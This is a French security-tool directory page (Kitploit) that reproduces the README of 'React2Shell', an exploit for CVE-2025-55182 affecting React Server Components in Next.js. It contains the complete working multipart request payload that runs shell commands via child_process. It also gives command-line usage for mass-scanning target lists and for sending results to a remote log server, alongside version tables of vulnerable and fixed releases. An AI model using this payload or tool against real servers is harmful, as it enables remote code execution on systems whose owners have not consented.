Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell est une preuve de concept d'exploitation pour CVE-2025-55182 affectant les implémentations vulnérables de React Server Components (RSC) dans Next.js | Kitploit
Outils/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell est une preuve de concept d'exploitation pour CVE-2025-55182 affectant les implémentations vulnérables de React Server Components (RSC) dans Next.js

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 27 joursPas encore vérifié

💀 Exploit React2Shell — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 Exécution de code à distance des composants serveur React

CVE-2025-55182

Écrit par INDRA


⚠️ Avertissement

Ce projet est fourni à des fins éducatives, de recherche en sécurité et de tests d'intrusion autorisés uniquement.

L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.

Utilisez cet exploit uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.


📖 Description

React2Shell est un exploit de preuve de concept pour CVE-2025-55182 affectant les implémentations vulnérables des composants serveur React (RSC) dans Next.js.

L'exploit envoie une requête multipart spécialement conçue qui abuse du flux de désérialisation vulnérable et extrait la sortie des commandes via la réponse de digest de redirection de l'application.

En cas de succès, l'exploit affiche la sortie de la commande exécutée directement dans le terminal.


✨ Fonctionnalités

  • 🚀 Mode cible unique
  • 🌍 Mode scan en masse
  • 🔄 Détection automatique HTTP et HTTPS
  • ⚡ Exécution multi-thread
  • 📝 Journalisation locale optionnelle
  • 🌐 Serveur de journalisation distant optionnel
  • 🎯 Sortie propre
  • 🛡 Vérification SSL désactivée (pour environnements de test)
  • 📂 Suppression des cibles en double

📦 Prérequis

Python 3.8+

Installer les dépendances :

root@kitploit:~
pip install requests urllib3

📁 Structure du projet

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 Versions vulnérables

React


Next.js

Vulnérable

  • 14.3.0-canary.77 et versions ultérieures
  • 15.x
  • 16.x

Corrigé

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 Requête HTTP utilisée

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 Utilisation

Afficher l'aide

root@kitploit:~
python exploit.py -h

Scanner une cible

root@kitploit:~
python exploit.py -u https://target.com

Scanner plusieurs cibles

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

Exécuter

root@kitploit:~
python exploit.py -f targets.txt

Enregistrer les résultats

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

Envoyer les résultats vers un serveur de journalisation distant

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

Tout ensemble

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 Options de ligne de commande


🖥 Exemple de sortie

root@kitploit:~
🚀 42 cibles chargées (HTTP + HTTPS)

🔥 [VULNÉRABLE] https://target.com/

💀 Sortie de la commande →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ Comment ça fonctionne

  1. Lit la/les cible(s)
  2. Génère automatiquement les URL HTTP et HTTPS
  3. Envoie une requête multipart spécialement conçue
  4. Analyse le digest de redirection
  5. Extrait la sortie de la commande
  6. Affiche l'exploitation réussie
  7. Stocke optionnellement les résultats localement ou à distance

📌 Remarques

  • Teste automatiquement HTTP et HTTPS lorsqu'aucun schéma n'est fourni.
  • Les cibles en double sont supprimées automatiquement.
  • Utilise 30 threads concurrents.
  • Ignore les certificats SSL invalides.
  • Le délai d'attente est de 10 secondes.

❤️ Crédits

  • Développement de l'exploit : INDRA
  • CVE : CVE-2025-55182

⚖️ Avis légal

L'utilisation non autorisée de ce logiciel contre des systèmes sans permission peut violer les lois locales, nationales ou internationales.

L'auteur n'est pas responsable de toute mauvaise utilisation.


⭐ Si ce projet a aidé votre recherche, envisagez de lui donner une étoile.

Bonne chasse 🕷️

Télécharger l’outil
VersionStatut
19.0⚠ Vulnérable
19.1.0⚠ Vulnérable
19.1.1⚠ Vulnérable
19.2.0⚠ Vulnérable
19.0.1✅ Corrigé
19.1.2✅ Corrigé
19.2.1✅ Corrigé
OptionDescription
-uURL cible
-fFichier contenant les domaines cibles
-oEnregistrer les cibles vulnérables localement
-lEnvoyer les résultats vers un serveur de journalisation distant
-hAfficher l'aide